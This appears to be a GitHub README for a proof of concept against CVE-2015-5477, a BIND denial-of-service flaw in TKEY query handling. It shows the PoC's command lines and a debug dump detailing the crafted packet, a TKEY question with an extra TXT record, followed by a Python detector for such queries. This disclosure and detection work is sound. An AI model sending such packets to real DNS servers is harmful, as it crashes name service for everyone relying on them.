
CVE-2015-5477 - An error in handling TKEY queries can cause named to exit with a REQUIRE assertion failure

Overview

cvss    :  7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C) base  

vendor  :  ISC BIND
product :  BIND
versions affected:   < 9.9.7-P2
                     < 9.10.2-P3

exploitability :
    * remotely exploitable
    * NO authentication required
    * NO user interaction required
    * NO special configuration required (default settings)
    ** NO configuration workaround

Abstract

For more information, see the original advisory: https://kb.isc.org/article/AA-01272

Proof of Concept (PoC)

# python cve-2015-5477/poc_cve-2015-5477.py  <target>
[ ] CVE-2015-5477 BIND 9 PoC
[i] target: <target>
 [+] sending DNSQ TKEY with additional record ...
 [!] pkt sent!


# python cve-2015-5477/poc_cve-2015-5477.py  <target> --debug
[ ] CVE-2015-5477 BIND 9 PoC
[i] target: <target>
 [+] sending DNSQ TKEY with additional record ...
###[ DNS ]###
  id        = 0
  qr        = 0
  opcode    = QUERY
  aa        = 0
  tc        = 0
  rd        = 1
  ra        = 0
  z         = 0
  ad        = 0
  cd        = 0
  rcode     = ok
  qdcount   = 1
  ancount   = 0
  nscount   = 0
  arcount   = 1
  \qd        \
   |###[ DNS Question Record ]###
   |  qname     = '.'
   |  qtype     = 249
   |  qclass    = ANY
  an        = None
  ns        = None
  ar        = None
###[ DNS Resource Record ]###
     rrname    = '.'
     type      = TXT
     rclass    = ANY
     ttl       = 0
     rdlen     = 2
     rdata     = 'x'
.
Sent 1 packets.
 [!] pkt sent!
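
For detection, the debug dump above gives the shape to look for: a QUERY whose question type is 249 (TKEY) and whose additional section carries a record of another type (TXT in the dump). The following is an added example, not part of the original PoC or of ISC's code; the function name and the allow-list of TKEY, TSIG and OPT as expected additional record types are assumptions of this example.

```python
import struct

TKEY, TSIG, OPT = 249, 250, 41      # RR type codes; 249 is the qtype in the dump
EXPECTED_EXTRA = {TKEY, TSIG, OPT}  # assumption: only these accompany a TKEY query

def _skip_name(msg, off):
    """Return the offset just past the DNS name that starts at off."""
    while True:
        length = msg[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:   # compression pointer ends the name
            return off + 2
        if length & 0xC0:
            raise ValueError("unsupported label type")
        off += 1 + length

def flag_tkey_query(msg):
    """Return the unexpected additional-section RR types in a TKEY query.

    msg is one DNS message as carried in a UDP payload. An empty list means it
    is not a TKEY query, is malformed, or has no unexpected additional record.
    """
    try:
        _id, flags, qd, an, ns, ar = struct.unpack_from("!6H", msg, 0)
        if flags & 0x8000 or (flags >> 11) & 0xF:   # response, or opcode != QUERY
            return []
        off, asks_tkey = 12, False
        for _ in range(qd):
            off = _skip_name(msg, off)
            qtype, _qclass = struct.unpack_from("!2H", msg, off)
            off += 4
            asks_tkey = asks_tkey or qtype == TKEY
        if not asks_tkey:
            return []
        hits = []
        for i in range(an + ns + ar):
            off = _skip_name(msg, off)
            rtype, _cls, _ttl, rdlen = struct.unpack_from("!2HIH", msg, off)
            off += 10 + rdlen
            if off > len(msg):
                return []           # rdata runs past the end of the message
            if i >= an + ns and rtype not in EXPECTED_EXTRA:
                hits.append(rtype)
        return hits
    except (struct.error, IndexError, ValueError):
        return []                   # truncated or malformed: nothing to report
```

Pass it the payload of each UDP packet sent to port 53; for DNS over TCP, strip the two-byte length prefix first. A non-empty result against a server older than 9.9.7-P2 or 9.10.2-P3 is worth correlating with named exits in the server log.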

Contact

tintinweb - https://github.com/tintinweb/pub/tree/master/pocs/cve-2015-5477

(0x721427D8)